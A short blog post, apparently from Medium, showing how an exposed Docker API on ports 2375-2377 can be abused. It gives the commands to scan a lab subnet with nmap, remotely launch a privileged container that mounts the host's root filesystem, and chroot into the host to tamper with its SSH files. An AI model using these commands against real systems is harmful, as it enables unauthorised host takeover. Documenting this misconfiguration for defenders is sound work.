Docker API Abuse

The docker API basically is an interface between docker daemon and docker image. The docker API is exposed via a Unix Socket at /var/run/docker.sock by default.The Docker daemon(server) uses this socket to listen to the API and the clients(docker images) use the socket to send API requests to the daemon. The image below shows the basic docker architecture:

Basic Docker architecture

When the docker API is accessed over TCP connection through docker ports like 2375,2376 and 2377, the docker client can access(or remote access) the docker daemon, which is running outside the host. In this blog we will see why exposing the docker API on the internet is a tremendous risk.

1.We start with a simple nmap scan to discover opened docker ports.Command: nmap -p2375,2376,2377 192.168.1.0/24

nmap scan result — Opened swarm port

2.As we can see in the above image, we found machine(192.168.1.40) having swarm port already opened. Checking our own ip.

Our IP: 192.168.1.41

3.Now we will run a misconfigured docker image from our machine (remotely) into the target machine(192.168.1.40). The command:

docker -H 192.168.1.40:2377 run -it — privileged — net host -v /:/host ubuntu /bin/bash

running docker container remotely

4.Moreover, if we run the above docker command making chroot inside container, we get the access to ssh folder wherein we can manipulate the ssh files.The command:

docker -H 192.168.1.40:2377 run -it — privileged — net host -v /:/host ubuntu chroot /host bash

ssh files access with chroot

Have fun!

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store